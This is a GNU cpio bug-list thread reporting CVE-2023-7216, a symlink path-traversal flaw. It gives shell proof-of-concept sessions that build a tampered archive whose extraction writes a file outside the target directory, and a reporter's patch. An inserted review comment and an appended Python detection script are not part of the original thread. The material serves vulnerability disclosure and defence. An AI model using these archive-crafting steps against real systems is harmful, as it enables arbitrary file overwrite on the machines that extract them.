bug-cpio

Re: Is there a fix for this CVE-2023-7216?


From: Peng
Subject: Re: Is there a fix for this CVE-2023-7216?
Date: Thu, 29 Feb 2024 21:35:48 +0800

Dear cpio maintainer:

This is a Red Hat Community Report on CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901

CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.

Red Hat's PoC for CVE-2023-7216 can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd  testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
Based on my understanding of the POC and analysis of CVE-2023-7216, I constructed two more POC scenarios.

POC1 can be reproduced using the following method:
Machine A can use the tampered trav.cpio file to overwrite any file on machine B, which may lead to remote command execution.

Machine A:
```
[root@localhostA home]# mkdir testcpio
[root@localhostA home]# ln -sf /tmp/ testcpio/tmp
[root@localhostA home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhostA home]# cd  testcpio/
[root@localhostA testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
```
Assume that machine A transfers the file to machine B through scp or another file transfer method. CVE-2023-7216 is triggered when machine B opens trav.cpio.

Machine B:
```
[root@localhostB home]# cpio -i < trav.cpio
[root@localhostB home]# cat /tmp/trav.txt
TEST Traversal
[root@localhostB home]# cat tmp/trav.txt
TEST Traversal
```
Impact of POC1: This indicates that any cpio archive file that contains symlinks may cause security risks such as path traversal.


POC2 can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd  testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# mkdir dirA
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio -D /home/dirA
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat dirA/tmp/trav.txt
TEST Traversal
```

Impact of POC2: When the -D option is used, the cpio file is expected to be decompressed in the specified directory. However, due to the impact of CVE-2023-7216, the file is also generated in the symlink directory, which is not as expected, like CVE-2015-1197. When the --no-absolute-filenames option is used, the decompressed file should be generated in the current directory instead of the symlink directory.

First of all, I would like to discuss an issue with you: when fixing CVE-2015-1197, the copy_link () function generates symlinks directly through the symlink () function if the --no-absolute-filenames option is not used when processing symlinks. This means that in this case, cpio allows writing files in arbitrary directories through symlinks. Is this what cpio was designed for?

I believe this design is the root cause of CVE-2023-7216. If you think this is a reasonable design, please let me know your reasons and provide a solution for CVE-2023-7216.

If you agree with me that cpio should not allow writing files in arbitrary directories through symlinks, then we can discuss my solution.

In my view, I don't think we can guarantee that the cpio archive does not contain any symlinks. We must handle each symlink the same way as the fix for CVE-2015-1197 during decompression. So I made a patch. I have attached the patch to the mail. If you have a better fix, please let me know.

I look forward to your feedback and suggestions soon.

Best Regards,
Peng
From 9cf2f601f9beec06b0e7b4fcf3f454195bff1b77 Mon Sep 17 00:00:00 2001
From: Peng <2773414454@qq.com>
Date: Thu, 29 Feb 2024 17:22:11 +0800
Subject: [PATCH] deafult use symlink_placeholder() to fix Path Traversal

---
 src/copyin.c | 26 +-------------------------
 1 file changed, 1 insertion(+), 25 deletions(-)

diff --git a/src/copyin.c b/src/copyin.c
index ace0a02..c454313 100644
--- a/src/copyin.c
+++ b/src/copyin.c
@@ -789,31 +789,7 @@ copyin_link (struct cpio_file_stat *file_hdr, int in_file_des)
       link_name = xstrdup (file_hdr->c_tar_linkname);
     }
 
-  if (no_abs_paths_flag)
-    symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
-  else
-    {
-      res = UMASKED_SYMLINK (link_name, file_hdr->c_name,
-			     file_hdr->c_mode);
-      if (res < 0 && create_dir_flag)
-	{
-	  create_all_directories (file_hdr->c_name);
-	  res = UMASKED_SYMLINK (link_name, file_hdr->c_name, file_hdr->c_mode);
-	}
-      if (res < 0)
-	symlink_error (link_name, file_hdr->c_name);
-      else if (!no_chown_flag)
-	{
-	  uid_t uid = set_owner_flag ? set_owner : file_hdr->c_uid;
-	  gid_t gid = set_group_flag ? set_group : file_hdr->c_gid;
-	  if (lchown (file_hdr->c_name, uid, gid) < 0 && errno != EPERM)
-	    chown_error_details (file_hdr->c_name, uid, gid);
-	}
-
-      if (retain_time_flag)
-	set_file_times (-1, file_hdr->c_name, file_hdr->c_mtime,
-			file_hdr->c_mtime, AT_SYMLINK_NOFOLLOW);
-    }
+  symlink_placeholder (link_name, file_hdr->c_name, file_hdr);
   free (link_name);
 }
 
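Review bot: deleting the whole `else` branch drops more than the direct `UMASKED_SYMLINK` call: the `create_dir_flag` retry through `create_all_directories`, the `lchown` / `chown_error_details` ownership handling under `!no_chown_flag`, and the `set_file_times(..., AT_SYMLINK_NOFOLLOW)` call under `retain_time_flag` all disappear, so unless `symlink_placeholder` and the deferred creation it feeds re-apply owner and mtime later, symlinks extracted by default will silently lose those attributes. `res` is assigned only in the removed code, so if it is declared earlier in `copyin_link` it is now an unused variable and will warn under -Wall; remove the declaration or keep the attribute handling in the deferred path and document the behaviour change in the commit message.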
-- 
2.33.0


------------------ Original ------------------
From: "Peng" <2773414454@qq.com>;
Date: Thu, Feb 29, 2024 07:02 PM
To: "bug-cpio"<bug-cpio@gnu.org>;"ntait"<ntait@redhat.com>;"gray"<gray@gnu.org.ua>;"mrehak"<mrehak@redhat.com>;
Subject: Re: Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:
This is a Red Hat Community Report on CVE-2023-7216: https://bugzilla.redhat.com/show_bug.cgi?id=2249901
CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
Red Hat's PoC for CVE-2023-7216 can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
First of all, I would like to confirm with you: do you accept CVE-2023-7216? Is CVE-2023-7216 a bug, or is it the default behavior of the cpio software?
If CVE-2023-7216 is a bug, I will try to provide a fix patch. Of course, if there is a better fix, please point it out.
CVE-2023-7216 is similar to CVE-2015-1197; both of them use a symlink to cause path traversal. The CVE-2015-1197 fix uses symlink_placeholder () to fix a path traversal issue in the --no-absolute-filenames scenario. However, CVE-2023-7216 proves that path traversal also exists in other scenarios.
So I made a patch to fix CVE-2023-7216: copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.
I look forward to your feedback and suggestions soon.
Best Regards,
Peng


------------------ Original ------------------
From: "2773414454" <2773414454@qq.com>;
Date: Tue, Feb 20, 2024 11:03 AM
To: "bug-cpio"<bug-cpio@gnu.org>;
Subject: Is there a fix for this CVE-2023-7216?

Dear cpio maintainer:

https://nvd.nist.gov/vuln/detail/CVE-2023-7216
NVD does not provide any related patch information.
Is there a fix for cpio's CVE-2023-7216?
[1] If not, what is the repair plan for cpio?
[2] If yes, can you indicate which submissions fix CVE-2023-7216?

peng


Attachment: 0001-deafult-use-symlink_placeholder-to-fix-Path-Traversa.patch.txt
Description: Binary data
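As an added example that is not part of this thread or of cpio itself, here is a small pre-extraction checker that parses a cpio archive and flags any entry whose path passes through an earlier symlink entry, which is exactly the shape of the tampered trav.cpio above (a `tmp -> /tmp/` symlink followed by `tmp/trav.txt`). It assumes the "newc" ASCII format (`cpio -H newc`) rather than the old binary format the PoC's `cpio -ov` writes by default; `newc_entry`, `build_archive`, `parse_newc` and `find_symlink_traversals` are names chosen here, and the archive it scans is constructed inline.

```python
import stat

NEWC_MAGIC = b"070701"  # magic of the "newc" ASCII cpio header (cpio -H newc)

def newc_entry(name, mode, data=b""):
    """Build one newc entry: 110-byte hex header, NUL-terminated name, data, 4-byte padding."""
    name_b = name.encode() + b"\0"
    # ino, mode, uid, gid, nlink, mtime, filesize, devmajor, devminor, rdevmajor, rdevminor, namesize, check
    fields = (0, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(name_b), 0)
    out = NEWC_MAGIC + b"".join(f"{v:08x}".encode() for v in fields) + name_b
    out += b"\0" * (-len(out) % 4)
    return out + data + b"\0" * (-len(data) % 4)

def build_archive(file_name):
    """Constructed sample mirroring the PoC: symlink 'tmp' -> '/tmp/' followed by one regular file."""
    return (newc_entry("tmp", stat.S_IFLNK | 0o777, b"/tmp/")
            + newc_entry(file_name, stat.S_IFREG | 0o644, b"TEST Traversal\n")
            + newc_entry("TRAILER!!!", 0))

def parse_newc(buf):
    """Yield (name, mode, data) for each entry until the TRAILER!!! record."""
    off = 0
    while True:
        if buf[off:off + 6] != NEWC_MAGIC:
            raise ValueError(f"bad newc magic at offset {off}")
        f = [int(buf[off + 6 + 8 * i:off + 14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = f[1], f[6], f[11]
        off += 110
        name = buf[off:off + namesize - 1].decode()
        off += namesize + (-(off + namesize) % 4)   # name is padded to a 4-byte boundary
        data = buf[off:off + filesize]
        off += filesize + (-(off + filesize) % 4)   # so is the file data
        if name == "TRAILER!!!":
            return
        yield name, mode, data

def find_symlink_traversals(buf):
    """Return (entry, symlink prefix, link target) for every entry whose path crosses an earlier symlink."""
    symlinks, hits = {}, []
    for name, mode, data in parse_newc(buf):
        parts = name.split("/")
        for i in range(1, len(parts)):          # check every directory prefix of the entry name
            prefix = "/".join(parts[:i])
            if prefix in symlinks:
                hits.append((name, prefix, symlinks[prefix]))
                break
        if stat.S_ISLNK(mode):                  # remember symlinks seen so far (data holds the target)
            symlinks[name.rstrip("/")] = data.decode()
    return hits

if __name__ == "__main__":
    print(find_symlink_traversals(build_archive("tmp/trav.txt")))   # the tampered archive
    print(find_symlink_traversals(build_archive("tmpYtrav.txt")))   # the archive before the sed edit
```

An archive that trips this check is the case the thread discusses: extracting it with a cpio that creates symlinks immediately would write the later file through the link, so reject it or extract it with the symlink deferred.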

